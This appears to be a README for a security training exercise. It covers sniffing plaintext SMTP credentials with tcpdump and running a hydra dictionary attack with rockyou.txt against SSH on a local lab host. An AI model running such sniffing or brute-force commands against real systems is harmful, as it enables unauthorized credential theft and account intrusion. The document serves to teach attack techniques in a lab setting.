attack_is_the_best_defense

Attack is the best defense

Resource

• Network sniffing
• ARP spoofing
• Connect to SendGrid’s SMTP relay using telnet
• What is Docker and why is it popular?
• Dictionary attack

Tasks

0. ARP spoofing and sniffing unencrypted traffic

sylvain@ubuntu$ telnet smtp.sendgrid.net 587
Trying 167.89.121.145...
Connected to smtp.sendgrid.net.
Escape character is '^]'.
220 SG ESMTP service ready at ismtpd0013p1las1.sendgrid.net
EHLO ismtpd0013p1las1.sendgrid.net
250-smtp.sendgrid.net
250-8BITMIME
250-PIPELINING
250-SIZE 31457280
250-STARTTLS
250-AUTH PLAIN LOGIN
250 AUTH=PLAIN LOGIN
auth login           
334 VXNlcm5hbWU6
VGhpcyBpcyBteSBsb2dpbg==
334 UGFzc3dvcmQ6
WW91IHJlYWxseSB0aG91Z2h0IEkgd291bGQgbGV0IG15IHBhc3N3b3JkIGhlcmU/ISA6RA==
235 Authentication successful
mail from: sylvain@kalache.fr
250 Sender address accepted
rcpt to: julien@google.com
250 Recipient address accepted
data
354 Continue
To: Julien
From: Sylvain
Subject: Hello from the insecure world

I am sending you this email from a Terminal.
.
250 Ok: queued as Aq1zhMM3QYeEprixUiFYNg
quit
221 See you later
Connection closed by foreign host.
sylvain@ubuntu$ 

# Run this when there is no other process running,
# ...tried to find a way to specifically filter the specif process but
# ...the best option was to run it in a virtual enviroment
# ...also base64 should be your best friend
sudo tcpdump -A -l

• user_authenticating_into_server binary script file.

1. Dictionary attack

• Wordlist Rockyou.txt

# command
hydra -V -s 2222 -l sylvain -P rockyou.txt 127.0.0.1 ssh -t 64